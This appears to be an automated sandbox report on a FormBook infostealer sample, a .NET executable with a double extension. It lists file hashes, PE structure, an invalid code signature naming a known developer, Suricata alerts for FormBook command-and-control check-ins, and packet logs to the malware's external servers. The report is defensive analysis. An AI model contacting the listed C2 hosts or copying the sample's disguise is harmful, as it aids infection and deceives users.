                                                                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                    Malicious:false
                                                                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    Static File Info

                                                                                                                    General

                                                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                    Entropy (8bit):7.78300708312092
                                                                                                                    TrID:
                                                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                                                                    • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                                                                    File name:SW_48912.scr.exe
                                                                                                                    File size:811'528 bytes
                                                                                                                    MD5:b4c5a379d38312666805d0d33e2801b7
                                                                                                                    SHA1:562aeee42c55410fbc2935cc9879236390ee8944
                                                                                                                    SHA256:77bd5b8fde14dc292c27e9526ee5c4d33b557d936deae82fa7abb3e768a74c3b
                                                                                                                    SHA512:8ad099afa50d7d0425adcf0fa3ddc63a3c6b59cce1f6800f9444c4c75727218c90e2d1986d747fa7eeb320153fee6dee41de78b4f934935c9742e89701404780
                                                                                                                    SSDEEP:12288:tuwWmcF55OHTDP19OsImqDqsL/dSdOjy0gIgfxt3VXP3T3d+0v3hBSzTCoMqSujq:t6FXOP1omGvAky0KxRlbdjfuTE+W
                                                                                                                    TLSH:A405029C2618E803C95527B44A71F2B92B75AEE9B802D3C35FD87DEFB5A6F644C05083
                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...b)jg.....................4........... ... ....@.. ....................................@................................

                                                                                                                    File Icon

                                                                                                                    Icon Hash:17b3cecece96d26d

                                                                                                                    Static PE Info

                                                                                                                    General

                                                                                                                    Entrypoint:0x4c1412
                                                                                                                    Entrypoint Section:.text
                                                                                                                    Digitally signed:true
                                                                                                                    Imagebase:0x400000
                                                                                                                    Subsystem:windows gui
                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                    Time Stamp:0x676A2962 [Tue Dec 24 03:24:18 2024 UTC]
                                                                                                                    TLS Callbacks:
                                                                                                                    CLR (.Net) Version:
                                                                                                                    OS Version Major:4
                                                                                                                    OS Version Minor:0
                                                                                                                    File Version Major:4
                                                                                                                    File Version Minor:0
                                                                                                                    Subsystem Version Major:4
                                                                                                                    Subsystem Version Minor:0
                                                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                    Authenticode Signature

                                                                                                                    Signature Valid:false
                                                                                                                    Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                                                    Signature Validation Error:The digital signature of the object did not verify
                                                                                                                    Error Number:-2146869232
                                                                                                                    Not Before, Not After
                                                                                                                    • 13/11/2018 00:00:00 08/11/2021 23:59:59
                                                                                                                    Subject Chain
                                                                                                                    • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                                                                    Version:3
                                                                                                                    Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                                                                    Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                                                                    Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                                                                    Serial:7C1118CBBADC95DA3752C46E47A27438

                                                                                                                    Entrypoint Preview

                                                                                                                    Instruction
                                                                                                                    jmp dword ptr [00402000h]
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al

                                                                                                                    Data Directories

                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xc13b80x57.text
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xc20000x30d0.rsrc
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0xc2c000x3608
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xc60000xc.reloc
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                    Sections

                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                    .text0x20000xbf4180xbf600053e8cfef5d4a1a90604d72854146f32False0.9167517145656434data7.785959501296895IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                    .rsrc0xc20000x30d00x3200b6bf34f530ca4616c32867170b4bac49False0.9015625data7.501197148359348IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                    .reloc0xc60000xc0x2000d7f4a96bf6cb22efd46ad5da84f9123False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                    Resources

                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                    RT_ICON0xc20e80x2ccfPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.965129456891291
                                                                                                                    RT_GROUP_ICON0xc4db80x14data1.05
                                                                                                                    RT_VERSION0xc4dcc0x304data0.4365284974093264

                                                                                                                    Imports

                                                                                                                    DLLImport
                                                                                                                    mscoree.dll_CorExeMain

                                                                                                                    Network Behavior

                                                                                                                    Suricata IDS Alerts

                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                    2024-12-24T11:36:03.324390+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449743104.21.10.2680TCP
                                                                                                                    2024-12-24T11:36:26.211792+01002856318ETPRO MALWARE FormBook CnC Checkin (POST) M41192.168.2.44977545.41.206.5780TCP
                                                                                                                    2024-12-24T11:36:28.480173+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44978145.41.206.5780TCP
                                                                                                                    2024-12-24T11:36:43.245455+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449820199.59.243.22780TCP
                                                                                                                    2024-12-24T11:36:58.016186+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449857162.0.236.16980TCP
                                                                                                                    2024-12-24T11:37:13.072050+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449896199.59.243.22780TCP
                                                                                                                    2024-12-24T11:37:27.821198+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449933199.59.243.22780TCP
                                                                                                                    2024-12-24T11:37:43.688311+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44997147.83.1.9080TCP
                                                                                                                    2024-12-24T11:37:59.023203+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450012104.21.80.180TCP
                                                                                                                    2024-12-24T11:38:14.539915+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45004185.159.66.9380TCP

                                                                                                                    Network Port Distribution

                                                                                                                    TCP Packets

                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Dec 24, 2024 11:36:02.005719900 CET4974380192.168.2.4104.21.10.26
                                                                                                                    Dec 24, 2024 11:36:02.125278950 CET8049743104.21.10.26192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:02.125400066 CET4974380192.168.2.4104.21.10.26
                                                                                                                    Dec 24, 2024 11:36:02.134627104 CET4974380192.168.2.4104.21.10.26
                                                                                                                    Dec 24, 2024 11:36:02.254379034 CET8049743104.21.10.26192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:03.323705912 CET8049743104.21.10.26192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:03.324348927 CET8049743104.21.10.26192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:03.324389935 CET4974380192.168.2.4104.21.10.26
                                                                                                                    Dec 24, 2024 11:36:03.327390909 CET4974380192.168.2.4104.21.10.26
                                                                                                                    Dec 24, 2024 11:36:03.447055101 CET8049743104.21.10.26192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:19.252490044 CET4976180192.168.2.445.41.206.57
                                                                                                                    Dec 24, 2024 11:36:19.372443914 CET804976145.41.206.57192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:19.372626066 CET4976180192.168.2.445.41.206.57
                                                                                                                    Dec 24, 2024 11:36:19.394500017 CET4976180192.168.2.445.41.206.57
                                                                                                                    Dec 24, 2024 11:36:19.514182091 CET804976145.41.206.57192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:20.504039049 CET804976145.41.206.57192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:20.504059076 CET804976145.41.206.57192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:20.504129887 CET4976180192.168.2.445.41.206.57
                                                                                                                    Dec 24, 2024 11:36:20.899158955 CET4976180192.168.2.445.41.206.57
                                                                                                                    Dec 24, 2024 11:36:21.917722940 CET4976680192.168.2.445.41.206.57
                                                                                                                    Dec 24, 2024 11:36:22.037386894 CET804976645.41.206.57192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:22.037486076 CET4976680192.168.2.445.41.206.57
                                                                                                                    Dec 24, 2024 11:36:22.053086996 CET4976680192.168.2.445.41.206.57
                                                                                                                    Dec 24, 2024 11:36:22.172733068 CET804976645.41.206.57192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:23.167867899 CET804976645.41.206.57192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:23.168026924 CET804976645.41.206.57192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:23.168109894 CET4976680192.168.2.445.41.206.57
                                                                                                                    Dec 24, 2024 11:36:23.555408001 CET4976680192.168.2.445.41.206.57
                                                                                                                    Dec 24, 2024 11:36:24.574218035 CET4977580192.168.2.445.41.206.57
                                                                                                                    Dec 24, 2024 11:36:24.694021940 CET804977545.41.206.57192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:24.694219112 CET4977580192.168.2.445.41.206.57
                                                                                                                    Dec 24, 2024 11:36:24.709280014 CET4977580192.168.2.445.41.206.57
                                                                                                                    Dec 24, 2024 11:36:24.829077959 CET804977545.41.206.57192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:24.829092979 CET804977545.41.206.57192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:24.829111099 CET804977545.41.206.57192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:24.829119921 CET804977545.41.206.57192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:24.829190016 CET804977545.41.206.57192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:24.829199076 CET804977545.41.206.57192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:24.829230070 CET804977545.41.206.57192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:24.829246044 CET804977545.41.206.57192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:24.829294920 CET804977545.41.206.57192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:26.211791992 CET4977580192.168.2.445.41.206.57
                                                                                                                    Dec 24, 2024 11:36:26.331784964 CET804977545.41.206.57192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:26.331832886 CET4977580192.168.2.445.41.206.57
                                                                                                                    Dec 24, 2024 11:36:27.230793953 CET4978180192.168.2.445.41.206.57
                                                                                                                    Dec 24, 2024 11:36:27.350472927 CET804978145.41.206.57192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:27.350614071 CET4978180192.168.2.445.41.206.57
                                                                                                                    Dec 24, 2024 11:36:27.360234976 CET4978180192.168.2.445.41.206.57
                                                                                                                    Dec 24, 2024 11:36:27.479912996 CET804978145.41.206.57192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:28.479993105 CET804978145.41.206.57192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:28.480073929 CET804978145.41.206.57192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:28.480173111 CET4978180192.168.2.445.41.206.57
                                                                                                                    Dec 24, 2024 11:36:28.482784033 CET4978180192.168.2.445.41.206.57
                                                                                                                    Dec 24, 2024 11:36:28.602320910 CET804978145.41.206.57192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:34.040486097 CET4979780192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:36:34.160119057 CET8049797199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:34.160216093 CET4979780192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:36:34.178350925 CET4979780192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:36:34.299937963 CET8049797199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:35.259273052 CET8049797199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:35.259351969 CET8049797199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:35.259362936 CET8049797199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:35.259438992 CET4979780192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:36:35.680660009 CET4979780192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:36:36.699233055 CET4980580192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:36:36.818835974 CET8049805199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:36.819354057 CET4980580192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:36:36.836536884 CET4980580192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:36:36.956123114 CET8049805199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:37.923403978 CET8049805199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:37.923439026 CET8049805199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:37.923505068 CET4980580192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:36:37.923521042 CET8049805199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:37.923564911 CET4980580192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:36:38.352402925 CET4980580192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:36:39.371185064 CET4981280192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:36:39.490859985 CET8049812199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:39.491044044 CET4981280192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:36:39.505783081 CET4981280192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:36:39.626466990 CET8049812199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:39.626507044 CET8049812199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:39.626559973 CET8049812199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:39.626589060 CET8049812199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:39.626616955 CET8049812199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:39.627139091 CET8049812199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:39.627240896 CET8049812199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:39.627940893 CET8049812199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:39.628026962 CET8049812199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:40.604724884 CET8049812199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:40.604790926 CET8049812199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:40.604829073 CET8049812199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:40.604918957 CET4981280192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:36:41.008807898 CET4981280192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:36:42.027570009 CET4982080192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:36:42.147488117 CET8049820199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:42.147741079 CET4982080192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:36:42.157037973 CET4982080192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:36:42.276649952 CET8049820199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:43.245138884 CET8049820199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:43.245212078 CET8049820199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:43.245249987 CET8049820199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:43.245455027 CET4982080192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:36:43.245455027 CET4982080192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:36:43.248267889 CET4982080192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:36:43.367784023 CET8049820199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:48.685698032 CET4983680192.168.2.4162.0.236.169
                                                                                                                    Dec 24, 2024 11:36:48.805821896 CET8049836162.0.236.169192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:48.805908918 CET4983680192.168.2.4162.0.236.169
                                                                                                                    Dec 24, 2024 11:36:48.820530891 CET4983680192.168.2.4162.0.236.169
                                                                                                                    Dec 24, 2024 11:36:48.940277100 CET8049836162.0.236.169192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:50.059297085 CET8049836162.0.236.169192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:50.059415102 CET8049836162.0.236.169192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:50.059478998 CET4983680192.168.2.4162.0.236.169
                                                                                                                    Dec 24, 2024 11:36:50.336869955 CET4983680192.168.2.4162.0.236.169
                                                                                                                    Dec 24, 2024 11:36:51.355278015 CET4984280192.168.2.4162.0.236.169
                                                                                                                    Dec 24, 2024 11:36:51.474843979 CET8049842162.0.236.169192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:51.474916935 CET4984280192.168.2.4162.0.236.169
                                                                                                                    Dec 24, 2024 11:36:51.489953041 CET4984280192.168.2.4162.0.236.169
                                                                                                                    Dec 24, 2024 11:36:51.609527111 CET8049842162.0.236.169192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:52.706269979 CET8049842162.0.236.169192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:52.706403971 CET8049842162.0.236.169192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:52.706473112 CET4984280192.168.2.4162.0.236.169
                                                                                                                    Dec 24, 2024 11:36:52.993144989 CET4984280192.168.2.4162.0.236.169
                                                                                                                    Dec 24, 2024 11:36:54.012258053 CET4985080192.168.2.4162.0.236.169
                                                                                                                    Dec 24, 2024 11:36:54.131901026 CET8049850162.0.236.169192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:54.132033110 CET4985080192.168.2.4162.0.236.169
                                                                                                                    Dec 24, 2024 11:36:54.147028923 CET4985080192.168.2.4162.0.236.169
                                                                                                                    Dec 24, 2024 11:36:54.266819954 CET8049850162.0.236.169192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:54.266851902 CET8049850162.0.236.169192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:54.266895056 CET8049850162.0.236.169192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:54.266993046 CET8049850162.0.236.169192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:54.267086029 CET8049850162.0.236.169192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:54.267122984 CET8049850162.0.236.169192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:54.267234087 CET8049850162.0.236.169192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:54.267277956 CET8049850162.0.236.169192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:54.267354012 CET8049850162.0.236.169192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:55.440538883 CET8049850162.0.236.169192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:55.440566063 CET8049850162.0.236.169192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:55.440807104 CET4985080192.168.2.4162.0.236.169
                                                                                                                    Dec 24, 2024 11:36:55.649947882 CET4985080192.168.2.4162.0.236.169
                                                                                                                    Dec 24, 2024 11:36:56.668656111 CET4985780192.168.2.4162.0.236.169
                                                                                                                    Dec 24, 2024 11:36:56.788502932 CET8049857162.0.236.169192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:56.788698912 CET4985780192.168.2.4162.0.236.169
                                                                                                                    Dec 24, 2024 11:36:56.798919916 CET4985780192.168.2.4162.0.236.169
                                                                                                                    Dec 24, 2024 11:36:56.918579102 CET8049857162.0.236.169192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:58.015944958 CET8049857162.0.236.169192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:58.015995979 CET8049857162.0.236.169192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:58.016185999 CET4985780192.168.2.4162.0.236.169
                                                                                                                    Dec 24, 2024 11:36:58.018775940 CET4985780192.168.2.4162.0.236.169
                                                                                                                    Dec 24, 2024 11:36:58.138892889 CET8049857162.0.236.169192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:03.753541946 CET4987580192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:03.873502970 CET8049875199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:03.873601913 CET4987580192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:03.887119055 CET4987580192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:04.008135080 CET8049875199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:04.969744921 CET8049875199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:04.969778061 CET8049875199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:04.969825029 CET4987580192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:04.969994068 CET8049875199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:04.970033884 CET4987580192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:05.399424076 CET4987580192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:06.418323994 CET4988180192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:06.539150953 CET8049881199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:06.539227009 CET4988180192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:06.556735039 CET4988180192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:06.676310062 CET8049881199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:07.638219118 CET8049881199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:07.638253927 CET8049881199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:07.638329029 CET8049881199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:07.638345957 CET4988180192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:07.638381958 CET4988180192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:08.071343899 CET4988180192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:09.090383053 CET4988880192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:09.304408073 CET8049888199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:09.305800915 CET4988880192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:09.320632935 CET4988880192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:09.443680048 CET8049888199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:09.443691015 CET8049888199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:09.443747997 CET8049888199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:09.443766117 CET8049888199.59.243.227192.168.2.4
